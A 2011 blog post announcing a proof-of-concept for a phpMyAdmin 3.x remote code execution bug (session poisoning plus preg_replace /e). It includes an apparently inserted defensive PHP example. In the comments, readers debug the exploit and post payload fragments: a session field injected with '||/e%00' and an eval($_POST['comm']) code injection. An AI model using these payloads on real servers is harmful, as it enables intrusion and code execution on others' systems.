Friday, July 8, 2011

phpMyAdmin 3.x preg_replace RCE POC

I'm flooded with requests for a POC, and many doubt that these vulnerabilities are exploitable. Since this vulnerability is technically rather interesting, I believe many could learn from it.

The POC uses the session manipulation vulnerability in combination with the remote code execution in preg_replace, as detailed in my last blog post. It only confirms whether the instance is exploitable or not, and you need valid credentials to the database. Use responsibly.

Download here

Edit: As 0x6a616d6573 reminded me, Blogger removes "%00" if it is not carefully encoded. The code posted was messed up because of this (the downloadable file was still fine).
Now it's fixed. I also added the "//" as suggested.
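The post and the comments below turn on two details: a caller-influenced string reaching preg_replace() as a pattern with the /e modifier (which makes PHP evaluate the replacement as code), and a null byte used to cut off whatever the application appends after the injected text. The following is an added example written for this page, not phpMyAdmin's code and not the post author's POC. It shows the two defensive measures a maintainer would apply at such a sink: a check that rejects a pattern carrying disallowed modifiers or a NUL byte, and a replacement routine that treats the user's string as data (preg_quote() plus preg_replace_callback()) rather than as a pattern or as code. The function names and all inputs are hypothetical. Note that this does not fix the root cause the post describes, externally writable $_SESSION entries; it only removes the code-execution sink those entries reached.

```php
<?php
declare(strict_types=1);

// Added example (hypothetical names, not phpMyAdmin's or the post's code).
// Assumes $pattern / $needle / $replacement / $subject may be attacker
// influenced, e.g. via a session entry the application trusts.

/**
 * Returns the modifier letters PHP would see after the closing delimiter of
 * $pattern, or null when the pattern is malformed. Follows PHP's own rules:
 * leading whitespace is skipped; the first byte is the delimiter unless it is
 * alphanumeric, a backslash or whitespace; (), [], {}, <> close with their
 * counterpart and nest; a backslash escapes the next byte.
 */
function pcre_modifiers(string $pattern): ?string
{
    $pattern = ltrim($pattern);
    if ($pattern === '') {
        return null;
    }
    $open = $pattern[0];
    if (ctype_alnum($open) || $open === '\\' || ctype_space($open)) {
        return null;
    }
    $pairs = ['(' => ')', '[' => ']', '{' => '}', '<' => '>'];
    $close = $pairs[$open] ?? $open;
    $depth = 1;
    $len = strlen($pattern);
    for ($i = 1; $i < $len; $i++) {
        $c = $pattern[$i];
        if ($c === '\\') {
            $i++;                               // skip the escaped byte
        } elseif ($c === $close && --$depth === 0) {
            return substr($pattern, $i + 1);    // everything after the delimiter
        } elseif ($c === $open && $open !== $close) {
            $depth++;                           // nested bracket delimiter
        }
    }
    return null;                                // no closing delimiter found
}

/**
 * Accepts a pattern only if it parses and uses none but the listed modifier
 * letters (so /e is never among them). A NUL byte anywhere is rejected too,
 * since the post shows one being used to truncate the appended text.
 * On PHP 7 and later /e no longer exists, so this matters for 5.x deployments.
 */
function pattern_is_safe(string $pattern, string $allowed = 'imsxu'): bool
{
    if (strpos($pattern, "\0") !== false) {
        return false;
    }
    $mods = pcre_modifiers($pattern);
    if ($mods === null) {
        return false;
    }
    return preg_match('/^[' . $allowed . ']*$/', $mods) === 1;
}

/**
 * Replaces literal occurrences of $needle. The needle is quoted so regex
 * metacharacters (and any delimiter or modifier text) are inert, and the
 * replacement comes from a callback, so it is neither evaluated as PHP code
 * (the only thing /e ever did) nor interpreted as a backreference template.
 */
function safe_literal_replace(string $needle, string $replacement, string $subject): string
{
    if ($needle === '') {
        return $subject;
    }
    $pattern = '/' . preg_quote($needle, '/') . '/';
    $result = preg_replace_callback(
        $pattern,
        static function (array $m) use ($replacement): string {
            return $replacement;
        },
        $subject
    );
    return $result ?? $subject;     // on a PCRE error, leave the input untouched
}

// Constructed inputs.
var_dump(pattern_is_safe('/foo/i'));          // bool(true)
var_dump(pattern_is_safe('||/e'));            // bool(false): delimiter '|', modifiers "/e"
var_dump(pattern_is_safe("/x/e\0/"));         // bool(false): NUL byte, and 'e' modifier
var_dump(safe_literal_replace('a.b', '[ok]', 'a.b axb'));   // string(8) "[ok] axb"
```

The check is deliberately a whitelist of modifier letters rather than a blacklist of 'e': any modifier the code path does not need is refused, and a malformed pattern (which preg_replace() would reject with a warning and a null return) is refused before it reaches PCRE at all. The literal-replacement helper is the shape the original sink should have had: the only regex in play is one the application itself writes.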

51 comments:

  1. It doesn't work. It shows me
    [i] Running...
    [*] Contacting server to authenticate.
    [i] Cookie:pma_mcrypt_iv=6usxi8fDjxY%3D; phpMyAdmin=83f941377c2ad368cb065ae3511c114b6ce908d7; pmaUser-1=K6%2BMQV0L8oo%3D; pmaPass-1=C7ohzD7vwAc%3D
    [i] Token:e498413730bbb8c51ce127b807160bf8
    [*] Contacting server to poison some _SESSION variables.
    [*] Contacting server to execute command.
    [!] Authentication error. Wrong password maby.
    [*] Exiting...

    I use PMA v3.4.3, PHP 5.3.5 on OS X
  2. @Anonymous

    I'll debug tomorrow. It would be helpful if you edited the code, changed $debug to true and emailed me the output at h@xxor.se
  3. @Mango: I appreciate the PoC, and I did learn something. I learned I should have spent more time trying to exploit this bug. lol :] Nice work!

    Also, to get the PoC working reliably, I simply added a URI-encoded null byte at the end of the regex string, and a comment delimiter at the end of the injected PHP code (the null is not needed there, BTW):

    '&_SESSION[src_uncommon_tables][0]=||/e'.

    Becomes

    '&_SESSION[src_uncommon_tables][0]=||/e%00'.

    And

    '\`.eval($_POST["comm"]);'."\x00" :

    Becomes

    '\`.eval($_POST["comm"]);//'."\x00" :
  4. Apparently Blogger eats URL-encoded nulls for breakfast, but I think you know what I mean from the description.
  5. Just tested with version 3.3.9.2 (unsuccessful) and tried 0x6a616d6573's ['\`.eval($_POST["comm"]);//'."\x00" :]

    Result of execution:
    [i] Running...
    [*] Contacting server to authenticate.
    [!] Fail. request returned 401. The host is not vulnerable or there is a problem with the supplied url.
    [*] Exiting...
    -------------

    Given that -u is set to https
  6. @Anon: Try echoing out the $result variable to see if that gives you some insight into how the 401 error is happening. Also, the null at the end of the PHP code isn't necessary. I don't know if that's the problem, but give it a go and let us know how it works.

    @Mango: Have you looked into the possibility of authentication bypass, since $_SESSION variables can apparently be overwritten? I realize the authentication within phpMyAdmin happens on two different layers (application and SQL), but bypassing phpMyAdmin's application-specific authentication should suffice for a pre-auth remote code execution condition. What do you think?
  7. @0x6a616d6573
    As I remember, the authentication can be bypassed without modifying the session. But I came to the conclusion that the code inevitably reaches some place where it needs a valid connection to the database before it hits any funny pieces of code.

    But please, if you can find something, tell me. =D
  8. Last Anon.

    Debug = 1

    http://www.pastie.org/private/66hsny5mrc8xw27dgsuitw
  9. @Anonymous

    Your server uses basic authentication. Use a URL like this:
    https://user:pass@db.xxxxxxxxxx.com:443/phpmyadmin

    I don't know if these credentials are the same as your DB credentials.
  10. Can you show me the LFI bug PoC?
  11. Great work, man!
    It took me a while to fully understand all this, but now it's clear! :)
    Congrats on the hard work!
  12. Download link does not work anymore :-(